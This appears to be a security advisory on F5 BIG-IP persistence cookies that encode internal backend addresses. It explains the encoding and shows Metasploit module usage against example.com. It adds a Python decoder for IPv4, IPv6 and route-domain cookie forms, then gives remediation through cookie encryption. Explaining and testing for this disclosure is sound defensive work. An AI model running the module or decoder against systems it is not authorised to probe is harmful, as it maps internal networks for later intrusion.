F5 BIG-IP Cookie Remote Information Disclosure
F5 BIG-IP load balancers use a persistence cookie (BIGipServer<pool name>) to pin a client to the backend server it was first balanced to. By default, the cookie value encodes the IP address and port of the pool member to which the client's traffic is directed. When the pool members are internal servers, this behavior exposes internal IP addresses to untrusted users.
Example Cookie Format
Set-Cookie: BIGipServerEXAMPLE.COM-POOL=201326602.20480.0000; path=/; HttpOnly; Secure
At first glance no internal IP is visible, but the value is only lightly encoded. The first field is the backend IPv4 address as a 32-bit integer with its bytes in reverse (little-endian) order, the second is the port with its two bytes swapped, and the third is reserved and always 0000. Here 201326602 is 0x0C00000A, whose bytes read in memory order as 10.0.0.12, and 20480 is 0x5000, which byte-swapped is 0x0050, port 80. Pool members with IPv6 addresses or in a non-default route domain use hex forms of the same information (prefixed vi or rd), so they leak just as much.
Disclosing internal IP addresses gives attackers knowledge of the internal network and lets them fine-tune later attacks. The information is also useful as a pretext in social engineering attacks.
Exploiting F5 BIG-IP Cookie Disclosure
Metasploit has a module which can be used to quickly obtain the internal IP:
msf6 > use auxiliary/gather/f5_bigip_cookie_disclosure
msf6 auxiliary(gather/f5_bigip_cookie_disclosure) > set RHOST example.com
msf6 auxiliary(gather/f5_bigip_cookie_disclosure) > run
This should produce output similar to the following:
[*] Running module against example.com
[*] Starting request /
[+] F5 BIG-IP load balancing cookie "BIGipServerEXAMPLE.COM-POOL = 201326602.20480.0000" found
[+] Load balancing pool name "EXAMPLE.COM-POOL" found
[+] Backend 10.0.0.12:80 found
[*] Auxiliary module execution completed
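What the module does under the hood, as an added example that is not from the page or from Metasploit: a Python decoder for BIGipServer cookies that handles the default IPv4 form shown above and also the hex forms BIG-IP uses for IPv6 pool members (vi prefix) and non-default route domains (rd prefix). The Set-Cookie values in SAMPLE_SET_COOKIES, their pool names and the addresses they encode are constructed for this example; only the first entry is the page's cookie. The same function doubles as a check after remediation: once cookie encryption is on, no BIGipServer value should decode any more.

```python
"""Decode F5 BIG-IP persistence cookies (BIGipServer*) into backend addresses."""
import ipaddress
import re
from typing import Dict, Iterable, Optional, Tuple

# Constructed Set-Cookie values for this example (not captured from a real host).
# The first one is the page's example cookie, which encodes 10.0.0.12:80.
SAMPLE_SET_COOKIES = [
    "BIGipServerEXAMPLE.COM-POOL=201326602.20480.0000; path=/; HttpOnly; Secure",
    "Set-Cookie: BIGipServerapp-v6-pool=vi20010db8000000000000000000000030.36895; path=/",
    "BIGipServerrd-pool=rd5o00000000000000000000ffffc0000201o8443; path=/",
    "sessionid=abc123; path=/; HttpOnly",  # unrelated cookie, must be ignored
]

COOKIE_RE = re.compile(r"^(BIGipServer[^=;]+)=([^;]+)")
# Default form: <ipv4 as little-endian int>.<byte-swapped port>.0000
IPV4_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")
# IPv6 member: vi<32 hex chars>.<byte-swapped port>
IPV6_RE = re.compile(r"^vi([0-9a-fA-F]{32})\.(\d+)$")
# Non-default route domain: rd<id>o<32 hex chars>o<plain port>
RD_RE = re.compile(r"^rd(\d+)o([0-9a-fA-F]{32})o(\d+)$")


def swap_port(n: int) -> int:
    """Undo the byte swap BIG-IP applies to the port (20480 -> 80)."""
    return int.from_bytes(n.to_bytes(2, "little"), "big")


def addr_from_hex(hex32: str) -> str:
    """32 hex chars are a 16-byte address; IPv4-mapped forms are shown as IPv4."""
    v6 = ipaddress.IPv6Address(bytes.fromhex(hex32))
    return str(v6.ipv4_mapped or v6)


def decode_member(value: str) -> Optional[Tuple[str, int, int]]:
    """Return (address, port, route_domain) or None if the value is not a known form."""
    m = IPV4_RE.match(value)
    if m:
        ip_int, port_int = int(m.group(1)), int(m.group(2))
        if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
            return None
        ip = str(ipaddress.IPv4Address(ip_int.to_bytes(4, "little")))
        return ip, swap_port(port_int), 0
    m = IPV6_RE.match(value)
    if m:
        return addr_from_hex(m.group(1)), swap_port(int(m.group(2))), 0
    m = RD_RE.match(value)
    if m:
        return addr_from_hex(m.group(2)), int(m.group(3)), int(m.group(1))
    return None


def find_backends(set_cookie_headers: Iterable[str]) -> Dict[str, Tuple[str, int, int]]:
    """Map pool name -> decoded backend for every plaintext BIGipServer cookie seen."""
    found: Dict[str, Tuple[str, int, int]] = {}
    for header in set_cookie_headers:
        header = re.sub(r"^Set-Cookie:\s*", "", header.strip(), flags=re.I)
        m = COOKIE_RE.match(header)
        if not m:
            continue
        pool = m.group(1)[len("BIGipServer"):]
        decoded = decode_member(m.group(2))
        if decoded:  # an encrypted cookie value matches none of the patterns
            found[pool] = decoded
    return found


if __name__ == "__main__":
    for pool, (addr, port, rd) in find_backends(SAMPLE_SET_COOKIES).items():
        print(f"pool {pool}: backend {addr}:{port} (route domain {rd})")
```

Feed find_backends the Set-Cookie headers from a response to the target; an empty result after enabling cookie encryption means the values no longer decode, while the pool name remains visible in the cookie name unless it is renamed in the persistence profile.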
Remediating F5 BIG-IP Cookie Remote Information Disclosure
The BIGipServer cookie is how a cookie persistence profile pins a client to the pool member it was first balanced to, so it cannot simply be removed without losing session persistence. Instead, BIG-IP can encrypt the cookie value with a passphrase configured in the persistence profile: the client still carries the cookie, but its contents are opaque. Encryption is enabled in the cookie persistence profile through the Configuration utility (or tmsh). Note that the pool name is still exposed in the default cookie name, so set a custom cookie name in the same profile if that is also sensitive, and re-test afterwards to confirm the value no longer decodes.
F5's guidance on the cookie encoding and on encrypting it is available at https://support.f5.com/csp/article/K6917